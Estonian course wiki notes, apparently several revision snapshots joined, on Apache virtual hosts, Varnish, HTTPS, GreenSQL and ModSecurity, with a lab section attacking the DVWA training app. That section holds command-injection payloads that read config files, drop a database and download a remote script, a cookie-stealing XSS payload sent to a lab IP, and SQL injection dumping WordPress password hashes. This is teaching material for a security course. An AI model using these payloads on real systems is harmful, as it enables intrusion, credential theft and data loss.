6. curl-loader - http://sourceforge.net/projects/curl-loader/files/ 
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/ 
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/ 
9. FWPTT - http://sourceforge.net/projects/fwptt/files/ 
10. http_load - http://www.acme.com/software/http_load/

Virtualhost apache2 näitel

2015-05-04T10:13:59Z

Mernits: /* installeerimine */

[[Category:IT infrastruktuuri teenused]]
=Apache seadistamine=

<pre>
/etc/hosts

192.168.56.101 www.planet.zz
192.168.56.101 sales.planet.zz
</pre>

<source lang="bash">

ping www.planet.zz

ping sales.planet.zz

apt-get update
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz

cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
address 192.168.56.201
netmask 255.255.255.0

EOL

ifup eth1:0

cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz
vim sales.planet.zz

a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload

</source>

=WordPress tuning=

<source lang="apache">
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName wp.planet.zz
DocumentRoot /var/www/wordpress
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/wordpress>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>

</VirtualHost>

</source>

Pange tähele muudetud Directory seadeid.
<Directory /var/www/wordpress>
AllowOverride All

<source lang="bash">
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires

</source>

Selle rea võib lisada alglaadimisel käivitatavasse faili ''/etc/rc.local''

Paigaldage oma valitud cace plugin wordpressile.

=Varnish=
Esmaselt tõstame apache2 porti 8080

<pre>
/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
</pre>
<source lang="bash">
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i

#testimiseks
grep ':80' *

service apache2 restart

#testimiseks
netstat -lntp

#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
</source>
<pre>
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,256m"
</pre>
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
<pre>
sub vcl_recv {

# Add a unique header containing the client address

remove req.http.X-Forwarded-For;

set req.http.X-Forwarded-For = client.ip;

# [...]

}

</pre>
<source lang="bash">
service varnish restart
</source>

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

<source lang="bash">
cd /etc/apache2/sites-available/
</source>
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

<source lang="bash">
nano wp
</source>

Sinna tuleb kirjutada CustomLog'i rea asemele

<source lang="bash">
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
</source>

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

<source lang="bash">
cd /etc/apache2/conf.d/
</source>

Tee sinna uus fail nimega näiteks '''varnishlog.conf'''
<source lang="bash">
nano varnishlog.conf
</source>

Kirjuta sinna see rida
<source lang="bash">
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
</source>

Tee apache2 teenusele restart
<source lang="bash">
service apache2 restart
</source>

=DVWA ründed=
=HTTPS konfigureerimine=

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
<pre>
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| + . |
| o + |
| * o |
| S + O |
| ..+ + + . |
| ...o o = |
| o+ o . |
| .o. E |
+-----------------+
</pre>

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

<pre>
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

</pre>

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

<pre>
Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key
</pre>

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

<pre>
ServerName www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
</pre>

a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

=ID kaart=

[[ID kaardiga autentimine Apache2 veebiserveriga]]

=DVWA ründed=
==cmd exec==
<source lang="bash">
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
</source>

<source lang="bash">
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
</source>

Loon faili kala /var/tmp kataloogi
<source lang="bash">
8.8.8.8; touch /var/tmp/kala.txt
</source>

Ning kontrollin kas fail loodi
<source lang="bash">
8.8.8.8; ls /var/tmp/
</source>

kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):
<source lang="bash">
8.8.8.8;mysqladmin DROP dvwa -y;
</source>

kuvada failide infot:
<source lang="bash">
8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz
</source>

skripti laadimine serverisse ning sellele käivitusbiti andmine:
<source lang="bash">
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh
</source>

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

'''session.cookie_httponly = 1'''

* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

'''session.cookie_httponly = 0'''

==XSS==
<source lang="javascript">
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
</source>
==veel XSSi==
<pre>
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
</pre>
==SQLi==
<source lang="sql">
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --

2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --

3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --

4' union select user_login,user_pass from wp.wp_users; #

3' union select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
</source>

=GreenSQL firewall=

<source lang="bash">
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb

dpkg -i greensql-fw_1.3.0_amd64.deb

apt-get install -f

#Modify existing virtualhost or create new virtualhost.

cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql

cd greensql
chmod 0777 templates_c
</source>

Kasutajanimi veebiliidesel on '''admin''' ja parool '''pwd'''.

Muutke DVWA config failis andmebaasi asukohta:

<pre>
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
</pre>

<source lang="bash">
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start
</source>

=modsecurity=
==installeerimine==

<source lang="bash">
apt-get install libapache2-mod-security2
</source>

Muutke faili '''/etc/apache2/mods-available/security2.conf'''

<source lang="apache">
<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity

# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
IncludeOptional /etc/modsecurity/*.conf
IncludeOptional /usr/share/modsecurity-crs/base_rules/*.conf
SecRuleEngine On

</IfModule>

</source>

Teeme nimelingi modsecurity reeglite seadistamiseks:

<source lang="bash">
ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/
</source>

=Apache2 tweaks=
<source lang="apache">
ServerSignature Off
ServerTokens Prod
</source>

http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3

== Apache testimine ==
Lisaks ab'le on olemas ka teisi utiliite:

1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi 
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php 
3. OpenWebLoad - http://openwebload.sourceforge.net/#download 
4. Allmon - https://code.google.com/p/allmon/downloads/list 
5. CLIF - http://clif.ow2.org/download/index.html 
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/ 
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/ 
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/ 
9. FWPTT - http://sourceforge.net/projects/fwptt/files/ 
10. http_load - http://www.acme.com/software/http_load/

Virtualhost apache2 näitel

2015-05-04T10:11:00Z

Mernits: /* installeerimine */

[[Category:IT infrastruktuuri teenused]]
=Apache seadistamine=

<pre>
/etc/hosts

192.168.56.101 www.planet.zz
192.168.56.101 sales.planet.zz
</pre>

<source lang="bash">

ping www.planet.zz

ping sales.planet.zz

apt-get update
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz

cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
address 192.168.56.201
netmask 255.255.255.0

EOL

ifup eth1:0

cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz
vim sales.planet.zz

a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload

</source>

=WordPress tuning=

<source lang="apache">
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName wp.planet.zz
DocumentRoot /var/www/wordpress
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/wordpress>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>

</VirtualHost>

</source>

Pange tähele muudetud Directory seadeid.
<Directory /var/www/wordpress>
AllowOverride All

<source lang="bash">
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires

</source>

Selle rea võib lisada alglaadimisel käivitatavasse faili ''/etc/rc.local''

Paigaldage oma valitud cace plugin wordpressile.

=Varnish=
Esmaselt tõstame apache2 porti 8080

<pre>
/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
</pre>
<source lang="bash">
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i

#testimiseks
grep ':80' *

service apache2 restart

#testimiseks
netstat -lntp

#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
</source>
<pre>
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,256m"
</pre>
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
<pre>
sub vcl_recv {

# Add a unique header containing the client address

remove req.http.X-Forwarded-For;

set req.http.X-Forwarded-For = client.ip;

# [...]

}

</pre>
<source lang="bash">
service varnish restart
</source>

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

<source lang="bash">
cd /etc/apache2/sites-available/
</source>
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

<source lang="bash">
nano wp
</source>

Sinna tuleb kirjutada CustomLog'i rea asemele

<source lang="bash">
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
</source>

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

<source lang="bash">
cd /etc/apache2/conf.d/
</source>

Tee sinna uus fail nimega näiteks '''varnishlog.conf'''
<source lang="bash">
nano varnishlog.conf
</source>

Kirjuta sinna see rida
<source lang="bash">
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
</source>

Tee apache2 teenusele restart
<source lang="bash">
service apache2 restart
</source>

=DVWA ründed=
=HTTPS konfigureerimine=

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
<pre>
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| + . |
| o + |
| * o |
| S + O |
| ..+ + + . |
| ...o o = |
| o+ o . |
| .o. E |
+-----------------+
</pre>

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

<pre>
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

</pre>

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

<pre>
Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key
</pre>

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

<pre>
ServerName www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
</pre>

a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

=ID kaart=

[[ID kaardiga autentimine Apache2 veebiserveriga]]

=DVWA ründed=
==cmd exec==
<source lang="bash">
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
</source>

<source lang="bash">
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
</source>

Loon faili kala /var/tmp kataloogi
<source lang="bash">
8.8.8.8; touch /var/tmp/kala.txt
</source>

Ning kontrollin kas fail loodi
<source lang="bash">
8.8.8.8; ls /var/tmp/
</source>

kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):
<source lang="bash">
8.8.8.8;mysqladmin DROP dvwa -y;
</source>

kuvada failide infot:
<source lang="bash">
8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz
</source>

skripti laadimine serverisse ning sellele käivitusbiti andmine:
<source lang="bash">
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh
</source>

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

'''session.cookie_httponly = 1'''

* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

'''session.cookie_httponly = 0'''

==XSS==
<source lang="javascript">
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
</source>
==veel XSSi==
<pre>
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
</pre>
==SQLi==
<source lang="sql">
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --

2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --

3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --

4' union select user_login,user_pass from wp.wp_users; #

3' union select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
</source>

=GreenSQL firewall=

<source lang="bash">
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb

dpkg -i greensql-fw_1.3.0_amd64.deb

apt-get install -f

#Modify existing virtualhost or create new virtualhost.

cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql

cd greensql
chmod 0777 templates_c
</source>

Kasutajanimi veebiliidesel on '''admin''' ja parool '''pwd'''.

Muutke DVWA config failis andmebaasi asukohta:

<pre>
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
</pre>

<source lang="bash">
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start
</source>

=modsecurity=
==installeerimine==

<source lang="bash">
apt-get install libapache2-mod-security2
</source>

Muutke faili '''/etc/apache2/mods-available/security2.conf'''

<source lang="apache">
<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity

# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
IncludeOptional /etc/modsecurity/*.conf
IncludeOptional /usr/share/modsecurity-crs/base_rules/*.conf

</IfModule>

</source>

Teeme nimelingi modsecurity reeglite seadistamiseks:

<source lang="bash">
ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/
</source>

=Apache2 tweaks=
<source lang="apache">
ServerSignature Off
ServerTokens Prod
</source>

http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3

== Apache testimine ==
Lisaks ab'le on olemas ka teisi utiliite:

1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi 
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php 
3. OpenWebLoad - http://openwebload.sourceforge.net/#download 
4. Allmon - https://code.google.com/p/allmon/downloads/list 
5. CLIF - http://clif.ow2.org/download/index.html 
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/ 
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/ 
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/ 
9. FWPTT - http://sourceforge.net/projects/fwptt/files/ 
10. http_load - http://www.acme.com/software/http_load/

Virtualhost apache2 näitel

2015-05-04T10:06:42Z

Mernits: /* CRS */

[[Category:IT infrastruktuuri teenused]]
=Apache seadistamine=

<pre>
/etc/hosts

192.168.56.101 www.planet.zz
192.168.56.101 sales.planet.zz
</pre>

<source lang="bash">

ping www.planet.zz

ping sales.planet.zz

apt-get update
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz

cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
address 192.168.56.201
netmask 255.255.255.0

EOL

ifup eth1:0

cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz
vim sales.planet.zz

a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload

</source>

=WordPress tuning=

<source lang="apache">
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName wp.planet.zz
DocumentRoot /var/www/wordpress
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/wordpress>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>

</VirtualHost>

</source>

Pange tähele muudetud Directory seadeid.
<Directory /var/www/wordpress>
AllowOverride All

<source lang="bash">
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires

</source>

Selle rea võib lisada alglaadimisel käivitatavasse faili ''/etc/rc.local''

Paigaldage oma valitud cace plugin wordpressile.

=Varnish=
Esmaselt tõstame apache2 porti 8080

<pre>
/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
</pre>
<source lang="bash">
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i

#testimiseks
grep ':80' *

service apache2 restart

#testimiseks
netstat -lntp

#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
</source>
<pre>
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,256m"
</pre>
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
<pre>
sub vcl_recv {

# Add a unique header containing the client address

remove req.http.X-Forwarded-For;

set req.http.X-Forwarded-For = client.ip;

# [...]

}

</pre>
<source lang="bash">
service varnish restart
</source>

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

<source lang="bash">
cd /etc/apache2/sites-available/
</source>
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

<source lang="bash">
nano wp
</source>

Sinna tuleb kirjutada CustomLog'i rea asemele

<source lang="bash">
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
</source>

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

<source lang="bash">
cd /etc/apache2/conf.d/
</source>

Tee sinna uus fail nimega näiteks '''varnishlog.conf'''
<source lang="bash">
nano varnishlog.conf
</source>

Kirjuta sinna see rida
<source lang="bash">
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
</source>

Tee apache2 teenusele restart
<source lang="bash">
service apache2 restart
</source>

=DVWA ründed=
=HTTPS konfigureerimine=

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
<pre>
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| + . |
| o + |
| * o |
| S + O |
| ..+ + + . |
| ...o o = |
| o+ o . |
| .o. E |
+-----------------+
</pre>

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

<pre>
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

</pre>

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

<pre>
Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key
</pre>

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

<pre>
ServerName www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
</pre>

a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

=ID kaart=

[[ID kaardiga autentimine Apache2 veebiserveriga]]

=DVWA ründed=
==cmd exec==
<source lang="bash">
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
</source>

<source lang="bash">
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
</source>

Loon faili kala /var/tmp kataloogi
<source lang="bash">
8.8.8.8; touch /var/tmp/kala.txt
</source>

Ning kontrollin kas fail loodi
<source lang="bash">
8.8.8.8; ls /var/tmp/
</source>

kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):
<source lang="bash">
8.8.8.8;mysqladmin DROP dvwa -y;
</source>

kuvada failide infot:
<source lang="bash">
